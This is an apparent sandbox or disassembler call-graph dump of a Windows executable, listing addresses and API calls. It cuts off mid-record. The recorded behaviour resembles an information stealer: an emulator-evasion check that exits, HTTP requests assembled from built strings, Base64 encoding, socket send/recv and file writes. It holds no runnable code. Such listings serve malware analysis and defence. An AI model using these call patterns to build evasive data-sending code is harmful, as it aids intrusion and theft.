14348 420407 14347->14348 14349 41f988 5 API calls 14348->14349 14350 420419 14349->14350 14351 41f988 5 API calls 14350->14351 14352 42042b 14351->14352 14353 41f988 5 API calls 14352->14353 14354 42043d 14353->14354 14355 41f988 5 API calls 14354->14355 14356 42044f 14355->14356 14357 41f988 5 API calls 14356->14357 14358 420461 14357->14358 14359 41f988 5 API calls 14358->14359 14360 420473 14359->14360 14361 41f988 5 API calls 14360->14361 14362 420485 14361->14362 14363 41f988 5 API calls 14362->14363 14364 420497 14363->14364 14365 41f988 5 API calls 14364->14365 14366 4204a9 14365->14366 14367 41f988 5 API calls 14366->14367 14368 4204bb 14367->14368 14369 41f988 5 API calls 14368->14369 14370 4204cd 14369->14370 14371 41f988 5 API calls 14370->14371 14372 4204df 14371->14372 14373 41f988 5 API calls 14372->14373 14374 4204f1 14373->14374 14375 41f988 5 API calls 14374->14375 14376 420503 14375->14376 14377 41f988 5 API calls 14376->14377 14378 420515 14377->14378 14379 41f988 5 API calls 14378->14379 14380 420527 14379->14380 14381 41f988 5 API calls 14380->14381 14382 420539 14381->14382 14383 41f988 5 API calls 14382->14383 14384 42054b 14383->14384 14385 41f988 5 API calls 14384->14385 14386 42055d 14385->14386 14387 42057d 14386->14387 14388 41f988 5 API calls 14386->14388 14389 4205a7 14387->14389 14390 41f988 5 API calls 14387->14390 14393 4205d7 14387->14393 14388->14387 14391 4205c5 14389->14391 14392 4205e9 14389->14392 14394 42059d 14390->14394 14567 41feac 14391->14567 14396 420676 GetTickCount GetDesktopWindow srand 14392->14396 14397 42068f 14392->14397 14398 41feac CloseHandle 14393->14398 14394->14389 14394->14393 14396->14397 14399 42069b rand 14397->14399 14398->14477 14399->14399 14400 4206ad 14399->14400 14401 4206f3 14400->14401 14405 41f988 5 API calls 14400->14405 14402 420716 14401->14402 14403 420727 14401->14403 14571 41fee8 14402->14571 14406 420725 14403->14406 14580 41fffa 14403->14580 14405->14401 14408 41feac CloseHandle 14406->14408 14410 420756 14408->14410 14409 4207b2 14412 41f988 5 API calls 14409->14412 14409->14477 14410->14409 14411 42096b 14410->14411 14410->14477 14585 41fa56 14411->14585 14414 4207f0 14412->14414 14416 41f988 5 API calls 14414->14416 14417 4207fc 14416->14417 14420 41f988 5 API calls 14417->14420 14418 41f988 5 API calls 14419 4209ba 14418->14419 14421 41f988 5 API calls 14419->14421 14422 420808 14420->14422 14423 4209c6 14421->14423 14424 41f988 5 API calls 14422->14424 14425 41f988 5 API calls 14423->14425 14426 420814 14424->14426 14427 4209d2 14425->14427 14428 41f988 5 API calls 14426->14428 14429 41f988 5 API calls 14427->14429 14430 420823 14428->14430 14431 4209de 14429->14431 14432 41f988 5 API calls 14430->14432 14433 41f988 5 API calls 14431->14433 14434 420832 14432->14434 14435 4209ed 14433->14435 14436 41f988 5 API calls 14434->14436 14438 41f988 5 API calls 14435->14438 14437 420841 14436->14437 14439 41f988 5 API calls 14437->14439 14440 4209fc 14438->14440 14441 420850 14439->14441 14442 41f988 5 API calls 14440->14442 14443 41f988 5 API calls 14441->14443 14444 420a0b 14442->14444 14445 42085f 14443->14445 14446 41f988 5 API calls 14444->14446 14447 41f988 5 API calls 14445->14447 14448 420a1a 14446->14448 14449 42086e 14447->14449 14450 41f988 5 API calls 14448->14450 14452 41f988 5 API calls 14449->14452 14451 420a29 14450->14451 14453 41f988 5 API calls 14451->14453 14454 42087d 14452->14454 14455 420a38 14453->14455 14456 41f988 5 API calls 14454->14456 14457 41f988 5 API calls 14455->14457 14458 42088c 14456->14458 14459 420a47 14457->14459 14460 41f988 5 API calls 14458->14460 14461 41f988 5 API calls 14459->14461 14462 42089b 14460->14462 14463 420a56 14461->14463 14464 41f988 5 API calls 14462->14464 14465 41f988 5 API calls 14463->14465 14466 4208aa 14464->14466 14467 420a65 14465->14467 14468 41f988 5 API calls 14466->14468 14470 41f988 5 API calls 14467->14470 14469 4208b9 14468->14469 14471 41f988 5 API calls 14469->14471 14472 420a74 14470->14472 14512 4208c8 14471->14512 14473 41f988 5 API calls 14472->14473 14474 420a83 14473->14474 14476 41f988 5 API calls 14474->14476 14475 4208e4 ??_U@YAPAXI memcpy ??2@YAPAXI memcpy 14475->14477 14478 420a92 14476->14478 14477->14301 14477->14477 14479 41f988 5 API calls 14478->14479 14480 420aa1 14479->14480 14481 41f988 5 API calls 14480->14481 14482 420ab0 14481->14482 14483 41f988 5 API calls 14482->14483 14484 420abf 14483->14484 14485 41f988 5 API calls 14484->14485 14486 420ace 14485->14486 14487 41f988 5 API calls 14486->14487 14488 420add 14487->14488 14489 41f988 5 API calls 14488->14489 14490 420aec 14489->14490 14491 41f988 5 API calls 14490->14491 14492 420afb 14491->14492 14493 41f988 5 API calls 14492->14493 14494 420b0a 14493->14494 14495 41f988 5 API calls 14494->14495 14496 420b19 14495->14496 14497 41f988 5 API calls 14496->14497 14498 420b28 14497->14498 14499 41f988 5 API calls 14498->14499 14500 420b37 14499->14500 14501 41f988 5 API calls 14500->14501 14502 420b46 14501->14502 14503 41f988 5 API calls 14502->14503 14504 420b55 14503->14504 14505 41f988 5 API calls 14504->14505 14506 420b64 14505->14506 14507 41f988 5 API calls 14506->14507 14509 420b7d 14506->14509 14507->14509 14508 420b9f 14508->14477 14511 41fa56 SetFilePointer 14508->14511 14509->14477 14509->14508 14510 41f988 5 API calls 14509->14510 14510->14508 14511->14512 14512->14475 14512->14477 14515 41f533 14513->14515 14514 41f6e3 14514->14311 14515->14514 14516 41f56a StrCmpCA 14515->14516 14516->14514 14517 41f580 StrCmpCA 14516->14517 14517->14514 14519 41f5b5 StrCmpCA 14517->14519 14519->14514 14521 41f5ea StrCmpCA 14519->14521 14521->14514 14523 41f61f StrCmpCA 14521->14523 14523->14514 14525 41f654 StrCmpCA 14523->14525 14525->14514 14528 41f685 StrCmpCA 14525->14528 14528->14514 14529 41f6af StrCmpCA 14528->14529 14529->14514 14532 41fad6 CreateFileA 14531->14532 14536 41fb26 14531->14536 14533 41fafb 14532->14533 14532->14536 14534 41fb48 13 API calls 14533->14534 14535 41fb0f 14534->14535 14535->14536 14537 41fb16 CloseHandle 14535->14537 14536->14319 14537->14536 14539 41fb84 SetFilePointer 14538->14539 14546 41fc19 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14538->14546 14540 41fb96 14539->14540 14541 41fbcb GetLocalTime SystemTimeToFileTime 14539->14541 14589 41f76e GetFileInformationByHandle 14540->14589 14597 41f6ed FileTimeToSystemTime 14541->14597 14545 41fbb6 SetFilePointer 14545->14546 14546->14319 14548 41fcbe 14547->14548 14551 41fcfe __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14547->14551 14549 41fcc6 GetLocalTime SystemTimeToFileTime 14548->14549 14548->14551 14599 41f6ed FileTimeToSystemTime 14549->14599 14551->14319 14600 41f6ed FileTimeToSystemTime 14552->14600 14554 41fda9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14554->14323 14556 41f99d 14555->14556 14565 41f9d9 14555->14565 14559 41f9b4 14556->14559 14562 41f9a9 ??_V@YAXPAX 14556->14562 14557 41fa01 14560 41fa0c memcpy 14557->14560 14566 41fa37 14557->14566 14558 41fa1e 14561 41fa25 WriteFile 14558->14561 14558->14566 14563 41f9b8 ??_U@YAPAXI 14559->14563 14564 41f9ca memcpy 14559->14564 14560->14566 14561->14566 14562->14563 14563->14564 14564->14565 14565->14557 14565->14558 14566->14329 14568 41fec7 14567->14568 14569 41feb9 14567->14569 14568->14477 14569->14568 14570 41fec0 CloseHandle 14569->14570 14570->14568 14572 41fef9 ??2@YAPAXI memset 14571->14572 14575 41ff20 14571->14575 14572->14575 14574 41ffc2 14609 41e990 14574->14609 14601 41d3ab 14575->14601 14583 420008 14580->14583 14582 42002c 14582->14406 14583->14582 14584 41f988 5 API calls 14583->14584 14634 41fe12 14583->14634 14584->14583 14586 41fa5c 14585->14586 14588 41fa66 14585->14588 14587 41fa80 SetFilePointer 14586->14587 14586->14588 14587->14588 14588->14418 14588->14477 14590 41f78d GetFileSize 14589->14590 14596 41f87c 14589->14596 14591 41f7d2 SetFilePointer ReadFile SetFilePointer ReadFile 14590->14591 14594 41f85c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14590->14594 14592 41f820 14591->14592 14591->14594 14593 41f82f SetFilePointer ReadFile 14592->14593 14592->14594 14593->14594 14594->14596 14598 41f6ed FileTimeToSystemTime 14594->14598 14596->14545 14596->14546 14597->14546 14598->14596 14599->14551 14600->14554 14602 41d3e0 14601->14602 14608 41d4d4 14601->14608 14603 41d3ee memset 14602->14603 14603->14603 14604 41d428 14603->14604 14605 41d440 memset 14604->14605 14605->14605 14607 41d478 14605->14607 14606 41d4a7 memset 14606->14607 14607->14606 14607->14608 14608->14574 14610 41e9c2 memset 14609->14610 14611 41e9ae 14609->14611 14612 41ea05 14610->14612 14611->14610 14613 41ea3b 14612->14613 14622 41ea87 14612->14622 14615 41f0a2 14613->14615 14618 41f0b3 14615->14618 14617 41f3c3 14617->14406 14619 41ea87 memcpy 14618->14619 14620 41f380 14618->14620 14621 41e2af memcpy 14618->14621 14619->14618 14626 41e2af 14620->14626 14621->14618 14625 41eaa5 14622->14625 14623 41ebd0 14623->14613 14624 41ead7 memcpy 14624->14625 14625->14623 14625->14624 14627 41e2da 14626->14627 14629 41e373 14627->14629 14630 41e4d6 14627->14630 14629->14617 14633 41e4e8 14630->14633 14631 41e5ab 14631->14629 14632 41e5dd memcpy 14632->14631 14633->14631 14633->14632 14635 41fe69 14634->14635 14636 41fe2b 14634->14636 14638 41fe70 ReadFile 14635->14638 14639 41fe62 14635->14639 14637 41fe3d memcpy 14636->14637 14636->14639 14637->14639 14638->14639 14639->14583 14651 41398e 14640->14651 14642 41a92d lstrlenA 14643 41a938 14642->14643 14644 41aa23 14642->14644 14645 413740 lstrcpyA 14643->14645 14647 4137c0 lstrcpyA 14643->14647 14648 41a9f3 StrCmpCA 14643->14648 14652 407382 14643->14652 14645->14643 14647->14643 14648->14643 14649 41aa06 14648->14649 14859 414805 14649->14859 14651->14642 14653 41370e lstrcpyA 14652->14653 14654 4073a7 14653->14654 14655 413740 lstrcpyA 14654->14655 14656 4073b7 14655->14656 14657 406be0 5 API calls 14656->14657 14658 4073c4 14657->14658 14862 414b70 14658->14862 14660 4073ec 14661 4073f9 lstrlenA 14660->14661 14662 407405 14661->14662 14663 414b70 7 API calls 14662->14663 14664 407411 14663->14664 14665 41370e lstrcpyA 14664->14665 14666 40741f 14665->14666 14667 41370e lstrcpyA 14666->14667 14668 407428 14667->14668 14669 41370e lstrcpyA 14668->14669 14670 407431 14669->14670 14671 41370e lstrcpyA 14670->14671 14672 40743a StrCmpCA 14671->14672 14673 407489 14672->14673 14674 40745c 14672->14674 14869 4148f3 14673->14869 14677 40746a InternetOpenA 14674->14677 14676 407497 14878 413806 14676->14878 14677->14673 14685 407cd0 14677->14685 14680 4137c0 lstrcpyA 14681 4074b1 14680->14681 14682 413860 3 API calls 14681->14682 14683 407506 14682->14683 14684 413806 2 API calls 14683->14684 14686 407512 14684->14686 14687 413740 lstrcpyA 14685->14687 14688 413860 3 API calls 14686->14688 14697 407d15 14687->14697 14689 40754c 14688->14689 14690 4137c0 lstrcpyA 14689->14690 14691 407555 14690->14691 14692 413860 3 API calls 14691->14692 14693 40757f 14692->14693 14694 413806 2 API calls 14693->14694 14695 40758b 14694->14695 14696 4137c0 lstrcpyA 14695->14696 14698 407593 14696->14698 14697->14643 14699 4075a1 InternetConnectA 14698->14699 14699->14685 14700 4075e4 HttpOpenRequestA 14699->14700 14701 407622 14700->14701 14702 407cc9 InternetCloseHandle 14700->14702 14703 407644 14701->14703 14704 407626 InternetSetOptionA 14701->14704 14702->14685 14705 413860 3 API calls 14703->14705 14704->14703 14706 407687 14705->14706 14707 4137c0 lstrcpyA 14706->14707 14708 40768f 14707->14708 14709 413806 2 API calls 14708->14709 14710 4076a2 14709->14710 14711 4137c0 lstrcpyA 14710->14711 14712 4076aa 14711->14712 14713 413860 3 API calls 14712->14713 14714 4076de 14713->14714 14715 4137c0 lstrcpyA 14714->14715 14716 4076e6 14715->14716 14717 413860 3 API calls 14716->14717 14718 4076fb 14717->14718 14719 4137c0 lstrcpyA 14718->14719 14720 407703 14719->14720 14721 413860 3 API calls 14720->14721 14722 407718 14721->14722 14723 4137c0 lstrcpyA 14722->14723 14724 407720 14723->14724 14725 413860 3 API calls 14724->14725 14726 40775d 14725->14726 14727 4137c0 lstrcpyA 14726->14727 14728 407765 14727->14728 14729 413806 2 API calls 14728->14729 14730 407778 14729->14730 14731 4137c0 lstrcpyA 14730->14731 14732 407780 14731->14732 14733 413860 3 API calls 14732->14733 14734 407795 14733->14734 14735 4137c0 lstrcpyA 14734->14735 14736 40779d 14735->14736 14737 413860 3 API calls 14736->14737 14738 4077b1 14737->14738 14739 4137c0 lstrcpyA 14738->14739 14740 4077b9 14739->14740 14741 413806 2 API calls 14740->14741 14742 4077cc 14741->14742 14743 4137c0 lstrcpyA 14742->14743 14744 4077d4 14743->14744 14745 413860 3 API calls 14744->14745 14746 4077e4 14745->14746 14747 4137c0 lstrcpyA 14746->14747 14748 4077ec 14747->14748 14749 413860 3 API calls 14748->14749 14750 407801 14749->14750 14751 4137c0 lstrcpyA 14750->14751 14752 407809 14751->14752 14753 413860 3 API calls 14752->14753 14754 40784d 14753->14754 14755 4137c0 lstrcpyA 14754->14755 14756 407855 14755->14756 14757 413860 3 API calls 14756->14757 14758 40786a 14757->14758 14759 4137c0 lstrcpyA 14758->14759 14760 407872 14759->14760 14761 413860 3 API calls 14760->14761 14762 407887 14761->14762 14763 4137c0 lstrcpyA 14762->14763 14764 40788f 14763->14764 14765 413860 3 API calls 14764->14765 14766 40789f 14765->14766 14767 4137c0 lstrcpyA 14766->14767 14768 4078a7 14767->14768 14769 413860 3 API calls 14768->14769 14770 4078bc 14769->14770 14771 4137c0 lstrcpyA 14770->14771 14772 4078c4 14771->14772 14773 413806 2 API calls 14772->14773 14774 4078d7 14773->14774 14775 4137c0 lstrcpyA 14774->14775 14776 4078df 14775->14776 14777 413860 3 API calls 14776->14777 14778 4078ef 14777->14778 14779 4137c0 lstrcpyA 14778->14779 14780 4078f7 14779->14780 14781 413860 3 API calls 14780->14781 14782 40790c 14781->14782 14783 4137c0 lstrcpyA 14782->14783 14784 407914 14783->14784 14785 413860 3 API calls 14784->14785 14786 407929 14785->14786 14787 4137c0 lstrcpyA 14786->14787 14788 407931 14787->14788 14789 413860 3 API calls 14788->14789 14790 407946 14789->14790 14791 4137c0 lstrcpyA 14790->14791 14792 40794e 14791->14792 14793 413860 3 API calls 14792->14793 14794 407960 14793->14794 14795 4137c0 lstrcpyA 14794->14795 14796 407968 14795->14796 14797 413860 3 API calls 14796->14797 14798 407978 14797->14798 14799 4137c0 lstrcpyA 14798->14799 14800 407980 14799->14800 14801 413860 3 API calls 14800->14801 14802 407995 14801->14802 14803 4137c0 lstrcpyA 14802->14803 14804 40799d 14803->14804 14805 413806 2 API calls 14804->14805 14806 4079b0 14805->14806 14807 4137c0 lstrcpyA 14806->14807 14808 4079b8 14807->14808 14809 413860 3 API calls 14808->14809 14810 4079c8 14809->14810 14811 4137c0 lstrcpyA 14810->14811 14812 4079d0 14811->14812 14813 413860 3 API calls 14812->14813 14814 4079e5 14813->14814 14815 4137c0 lstrcpyA 14814->14815 14816 4079ed 14815->14816 14817 413860 3 API calls 14816->14817 14818 407a2a 14817->14818 14819 4137c0 lstrcpyA 14818->14819 14820 407a32 14819->14820 14821 413860 3 API calls 14820->14821 14822 407a46 14821->14822 14823 4137c0 lstrcpyA 14822->14823 14824 407a4e 14823->14824 14825 407a62 lstrlenA 14824->14825 14882 41398e 14825->14882 14827 407a78 lstrlenA GetProcessHeap RtlAllocateHeap 14828 407aa0 14827->14828 14829 407ab0 lstrlenA memcpy 14828->14829 14883 41398e 14829->14883 14831 407ad0 lstrlenA memcpy 14884 41398e 14831->14884 14833 407af4 lstrlenA 14834 407b06 14833->14834 14835 407b16 lstrlenA memcpy 14834->14835 14837 407b2c 14835->14837 14836 407b44 lstrlenA 14836->14837 14837->14836 14838 407b50 HttpSendRequestA 14837->14838 14839 407b62 Sleep 14838->14839 14840 407bbf 14838->14840 14841 407b77 14839->14841 14845 407b7c 14839->14845 14842 407bca HttpQueryInfoA 14840->14842 14841->14837 14841->14845 14843 407bf3 14842->14843 14844 407d69 14842->14844 14843->14844 14849 407c04 InternetReadFile 14843->14849 14846 41370e lstrcpyA 14844->14846 14847 41370e lstrcpyA 14845->14847 14846->14697 14848 407bb7 14847->14848 14848->14697 14850 407c21 14849->14850 14853 407c75 14849->14853 14850->14853 14857 407c28 14850->14857 14851 413860 3 API calls 14851->14857 14852 407ca6 StrCmpCA 14854 407cb5 ExitProcess 14852->14854 14855 407cbd InternetCloseHandle 14852->14855 14853->14852 14855->14702 14856 4137c0 lstrcpyA 14856->14857 14857->14851 14857->14853 14857->14856 14858 407c57 InternetReadFile 14857->14858 14858->14853 14858->14857 14860 41480d memset 14859->14860 14861 41481e 14859->14861 14860->14861 14861->14644 14863 414b82 14862->14863 14868 414be4 14862->14868 14864 414b96 CryptBinaryToStringA 14863->14864 14863->14868 14865 414bb0 GetProcessHeap RtlAllocateHeap 14864->14865 14864->14868 14866 414bcb CryptBinaryToStringA 14865->14866 14865->14868 14867 414bf4 GetLastError GetProcessHeap HeapFree 14866->14867 14866->14868 14867->14868 14868->14660 14870 41370e lstrcpyA 14869->14870 14871 41490a 14870->14871 14872 41370e lstrcpyA 14871->14872 14873 41495b GetSystemTime 14872->14873 14875 4149e2 14873->14875 14876 41497a 14873->14876 14874 4149bd lstrlenA 14874->14876 14875->14676 14876->14874 14876->14875 14885 4138ba 14876->14885 14879 413830 14878->14879 14880 4074a9 14879->14880 14881 413844 lstrcpyA lstrcatA 14879->14881 14880->14680 14881->14880 14882->14827 14883->14831 14884->14833 14888 4138e6 14885->14888 14887 4138cc 14887->14876 14889 4138f5 14888->14889 14891 413916 14888->14891 14890 41393b lstrcpyA 14889->14890 14889->14891 14890->14891 14891->14887 14922 40106e GetCurrentProcess VirtualAllocExNuma 14923 4010a3 ExitProcess 14922->14923 14924 40109b 14922->14924 14924->14923 19366 406bae 19367 406be6 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 19366->19367 19368 406bb8 19366->19368 19375 41398e 19367->19375 19371 406c49 lstrlenA 19376 41398e 19371->19376 19373 406c55 InternetCrackUrlA 19374 406c63 19373->19374 19375->19371 19376->19373 14925 406c70 14926 413740 lstrcpyA 14925->14926 14927 406c9b 14926->14927 14928 406be0 5 API calls 14927->14928 14929 406ca8 14928->14929 14930 41370e lstrcpyA 14929->14930 14931 406cba 14930->14931 14932 41370e lstrcpyA 14931->14932 14933 406cc3 14932->14933 14934 41370e lstrcpyA 14933->14934 14935 406ccc 14934->14935 14936 41370e lstrcpyA 14935->14936 14937 406cd5 14936->14937 14938 41370e lstrcpyA 14937->14938 14939 406cde 14938->14939 14940 406ceb InternetOpenA StrCmpCA 14939->14940 14941 4072fb InternetCloseHandle 14940->14941 14942 406d1e 14940->14942 14946 407314 14941->14946 14943 4148f3 4 API calls 14942->14943 14944 406d2f 14943->14944 14945 413806 2 API calls 14944->14945 14947 406d41 14945->14947 14948 413740 lstrcpyA 14946->14948 14949 4137c0 lstrcpyA 14947->14949 14959 407327 14948->14959 14950 406d49 14949->14950 14951 413860 3 API calls 14950->14951 14952 406d87 14951->14952 14953 4137c0 lstrcpyA 14952->14953 14954 406d8f 14953->14954 14955 413860 3 API calls 14954->14955 14956 406dcd 14955->14956 14957 4137c0 lstrcpyA 14956->14957 14958 406dd5 14957->14958 14960 413806 2 API calls 14958->14960 14961 406de8 14960->14961 14962 4137c0 lstrcpyA 14961->14962 14963 406df0 14962->14963 14964 413860 3 API calls 14963->14964 14965 406e24 14964->14965 14966 4137c0 lstrcpyA 14965->14966 14967 406e2c 14966->14967 14968 413860 3 API calls 14967->14968 14969 406e40 14968->14969 14970 4137c0 lstrcpyA 14969->14970 14971 406e48 14970->14971 14972 413860 3 API calls 14971->14972 14973 406e60 14972->14973 14974 413806 2 API calls 14973->14974 14975 406e6c 14974->14975 14976 4137c0 lstrcpyA 14975->14976 14977 406e74 14976->14977 14978 406e82 InternetConnectA 14977->14978 14978->14941 14979 406ec8 HttpOpenRequestA 14978->14979 14980 406f03 14979->14980 14981 4072f4 InternetCloseHandle 14979->14981 14982 406f12 InternetSetOptionA 14980->14982 14983 406f2a 14980->14983 14981->14941 14982->14983 14984 413860 3 API calls 14983->14984 14985 406f67 14984->14985 14986 4137c0 lstrcpyA 14985->14986 14987 406f6f 14986->14987 14988 413806 2 API calls 14987->14988 14989 406f7f 14988->14989 14990 4137c0 lstrcpyA 14989->14990 14991 406f87 14990->14991 14992 413860 3 API calls 14991->14992 14993 406fbb 14992->14993 14994 4137c0 lstrcpyA 14993->14994 14995 406fc3 14994->14995 14996 413860 3 API calls 14995->14996 14997 406fd8 14996->14997 14998 4137c0 lstrcpyA 14997->14998 14999 406fe0 14998->14999 15000 413860 3 API calls 14999->15000 15001 407015 15000->15001 15002 4137c0 lstrcpyA 15001->15002 15003 40701d 15002->15003 15004 413860 3 API calls 15003->15004 15005 407054 15004->15005 15006 4137c0 lstrcpyA 15005->15006 15007 40705c 15006->15007 15008 413806 2 API calls 15007->15008 15009 40706f 15008->15009 15010 4137c0 lstrcpyA 15009->15010 15011 407077 15010->15011 15012 413860 3 API calls 15011->15012 15013 40708c 15012->15013 15014 4137c0 lstrcpyA 15013->15014 15015 407094 15014->15015 15016 413860 3 API calls 15015->15016 15017 4070a8 15016->15017 15018 4137c0 lstrcpyA 15017->15018 15019 4070b0 15018->15019 15020 413806 2 API calls 15019->15020 15021 4070c3 15020->15021 15022 4137c0 lstrcpyA 15021->15022 15023 4070cb 15022->15023 15024 413860 3 API calls 15023->15024 15025 4070db 15024->15025 15026 4137c0 lstrcpyA 15025->15026 15027 4070e3 15026->15027 15028 413860 3 API calls 15027->15028 15029 4070f8 15028->15029 15030 4137c0 lstrcpyA 15029->15030 15031 407102 15030->15031 15032 413860 3 API calls 15031->15032 15033 40713d 15032->15033 15034 4137c0 lstrcpyA 15033->15034 15035 407145 15034->15035 15036 413860 3 API calls 15035->15036 15037 407159 15036->15037 15038 4137c0 lstrcpyA 15037->15038 15039 407161 15038->15039 15040 413806 2 API calls 15039->15040 15041 407174 15040->15041 15042 4137c0 lstrcpyA 15041->15042 15043 40717c 15042->15043 15044 41370e lstrcpyA 15043->15044 15045 407192 15044->15045 15046 413806 2 API calls 15045->15046 15047 4071a1 15046->15047 15048 413806 2 API calls 15047->15048 15049 4071ad 15048->15049 15050 4137c0 lstrcpyA 15049->15050 15053 4071b5 15050->15053 15051 4071dd lstrlenA 15051->15053 15052 4071fa lstrlenA 15052->15053 15053->15051 15053->15052 15054 407272 InternetReadFile 15053->15054 15055 407217 Sleep 15053->15055 15056 4072da InternetCloseHandle 15054->15056 15057 40728f 15054->15057 15058 407235 15055->15058 15059 407228 15055->15059 15060 4072eb 15056->15060 15057->15056 15065 407296 15057->15065 15061 41370e lstrcpyA 15058->15061 15059->15053 15059->15058 15060->14981 15063 407265 15061->15063 15062 413860 3 API calls 15062->15065 15063->14959 15064 4137c0 lstrcpyA 15064->15065 15065->15056 15065->15062 15065->15064 15066 4072bc InternetReadFile 15065->15066 15066->15056 15066->15065 15067 409ef0 15068 409f02 15067->15068 15165 412b5a 15068->15165 15071 409f59 15170 412672 15071->15170 15072 409f45 memmove 15072->15071 15075 409fac memmove 15076 409fc0 15075->15076 15076->15076 15077 412b5a 12 API calls 15076->15077 15078 40a047 15077->15078 15079 40a08c 15078->15079 15080 40a075 memmove 15078->15080 15081 412672 10 API calls 15079->15081 15080->15079 15082 40a0ca 15081->15082 15083 40a0f1 memmove 15082->15083 15085 40a101 15082->15085 15083->15085 15084 412b5a 12 API calls 15086 40a18e 15084->15086 15085->15084 15085->15085 15087 40a1bd 15086->15087 15088 40a1a6 memmove 15086->15088 15182 409942 15087->15182 15088->15087 15091 409942 2 API calls 15092 40a204 15091->15092 15093 409942 2 API calls 15092->15093 15094 40a20d 15093->15094 15095 409942 2 API calls 15094->15095 15096 40a216 15095->15096 15097 409942 2 API calls 15096->15097 15098 40a21f 15097->15098 15099 409942 2 API calls 15098->15099 15100 40a228 15099->15100 15101 409942 2 API calls 15100->15101 15102 40a231 send 15101->15102 15104 40a343 closesocket WSACleanup 15102->15104 15105 40a265 recv 15102->15105 15107 41232c 13 API calls 15104->15107 15105->15104 15106 40a283 15105->15106 15186 41232c 15106->15186 15108 40a374 15107->15108 15110 409942 2 API calls 15108->15110 15112 40a770 15110->15112 15115 409942 2 API calls 15112->15115 15118 40a77c 15115->15118 15116 40a379 15120 40a381 15116->15120 15121 40a3ca 15116->15121 15117 40a32b 15119 412b82 10 API calls 15117->15119 15122 40a33e 15119->15122 15124 412b82 10 API calls 15120->15124 15123 412b82 10 API calls 15121->15123 15127 409882 11 API calls 15122->15127 15125 40a3d9 15123->15125 15126 40a392 15124->15126 15125->15122 15130 412b82 10 API calls 15125->15130 15128 412b82 10 API calls 15126->15128 15137 40a3bf 15127->15137 15129 40a3a5 15128->15129 15131 412b82 10 API calls 15129->15131 15130->15125 15133 40a3b1 15131->15133 15132 40a456 send 15135 40a725 closesocket WSACleanup 15132->15135 15162 40a48f 15132->15162 15199 409882 15133->15199 15139 40a723 15135->15139 15140 41232c 13 API calls 15135->15140 15137->15132 15141 412b82 10 API calls 15137->15141 15138 40a4b6 recv 15142 40a67f 15138->15142 15138->15162 15143 409942 2 API calls 15139->15143 15140->15139 15141->15137 15146 412b82 10 API calls 15142->15146 15144 40a758 15143->15144 15148 409942 2 API calls 15144->15148 15147 40a6a3 15146->15147 15149 412b82 10 API calls 15147->15149 15148->15108 15150 40a6ac send closesocket WSACleanup 15149->15150 15152 40a6f5 15150->15152 15153 40a708 15150->15153 15241 412354 15152->15241 15155 409942 2 API calls 15153->15155 15156 40a711 15155->15156 15157 409942 2 API calls 15156->15157 15158 40a71a 15157->15158 15160 412bf2 2 API calls 15158->15160 15160->15139 15162->15138 15162->15142 15163 40a631 memmove 15162->15163 15211 412c14 15162->15211 15224 412d80 15162->15224 15229 412dc2 15162->15229 15237 412bf2 15162->15237 15163->15162 15166 412b72 15165->15166 15167 412b67 strlen 15165->15167 15168 409882 11 API calls 15166->15168 15167->15166 15169 409f20 15168->15169 15169->15071 15169->15072 15171 412683 15170->15171 15172 4126ed 15170->15172 15174 4126f4 15171->15174 15175 412699 15171->15175 15260 412528 15172->15260 15270 412538 15174->15270 15181 409f91 15175->15181 15250 412464 15175->15250 15180 4126c5 memcpy 15180->15181 15181->15075 15181->15076 15183 409958 15182->15183 15184 40994d 15182->15184 15183->15091 15185 4122f4 2 API calls 15184->15185 15185->15183 15187 412344 15186->15187 15188 412339 strlen 15186->15188 15189 412354 12 API calls 15187->15189 15188->15187 15190 40a2ea rand rand rand rand 15189->15190 15191 412b82 15190->15191 15192 412b96 15191->15192 15193 412beb 15191->15193 15195 412464 9 API calls 15192->15195 15197 40a323 15192->15197 15194 412538 8 API calls 15193->15194 15196 412ba6 15195->15196 15196->15197 15198 412bc4 memset 15196->15198 15197->15116 15197->15117 15198->15197 15200 4098ba 15199->15200 15201 409894 15199->15201 15202 4098c5 15200->15202 15203 40990b 15200->15203 15201->15200 15204 4098ac 15201->15204 15205 4098b8 15202->15205 15208 412464 9 API calls 15202->15208 15206 412538 8 API calls 15203->15206 15207 412672 10 API calls 15204->15207 15205->15137 15207->15205 15209 4098d5 15208->15209 15209->15205 15210 4098e3 memcpy 15209->15210 15210->15205 15212 412c2b 15211->15212 15217 412cc5 15211->15217 15213 412c43 15212->15213 15214 412cd9 memmove 15212->15214 15215 412d68 15213->15215 15216 412c4f 15213->15216 15214->15217 15333 412d70 15215->15333 15218 4125e0 3 API calls 15216->15218 15217->15162 15220 412c69 memmove memmove memmove 15218->15220 15220->15217 15222 412cb7 15220->15222 15223 4122f4 2 API calls 15222->15223 15223->15217 15225 412dbb 15224->15225 15226 412d9a 15224->15226 15225->15162 15227 4125e0 3 API calls 15226->15227 15228 412da2 memmove 15227->15228 15228->15225 15230 412df3 15229->15230 15231 412dfe 15229->15231 15232 412354 12 API calls 15230->15232 15337 4127e8 15231->15337 15232->15231 15235 409942 2 API calls 15236 412e23 15235->15236 15236->15162 15238 412c07 15237->15238 15239 412bf8 15237->15239 15238->15162 15240 4122f4 2 API calls 15239->15240 15240->15238 15242 412365 15241->15242 15243 41238a 15241->15243 15242->15243 15246 41237c 15242->15246 15244 412464 9 API calls 15243->15244 15245 412394 15244->15245 15248 412388 15245->15248 15249 4123a6 memcpy 15245->15249 15373 4123ca 15246->15373 15248->15153 15249->15248 15251 4124be 15250->15251 15252 41246e 15250->15252 15255 412538 8 API calls 15251->15255 15253 412480 15252->15253 15254 412475 15252->15254 15258 41247e 15253->15258 15284 4122aa 15253->15284 15278 412548 15254->15278 15257 4124c3 15255->15257 15258->15180 15258->15181 15261 41252d 15260->15261 15303 420e1b 15261->15303 15263 412537 15310 420dfb 15263->15310 15271 41253d 15270->15271 15272 420dfb 4 API calls 15271->15272 15273 412547 15272->15273 15274 4125e0 3 API calls 15273->15274 15275 412594 15274->15275 15276 4125c6 15275->15276 15277 4122f4 2 API calls 15275->15277 15277->15276 15279 412589 15278->15279 15290 4125e0 15279->15290 15281 412594 15282 4125c6 15281->15282 15298 4122f4 15281->15298 15282->15258 15285 4122e0 15284->15285 15286 4122ba 15284->15286 15285->15258 15286->15285 15287 4122d6 15286->15287 15288 4122c8 memcpy 15286->15288 15289 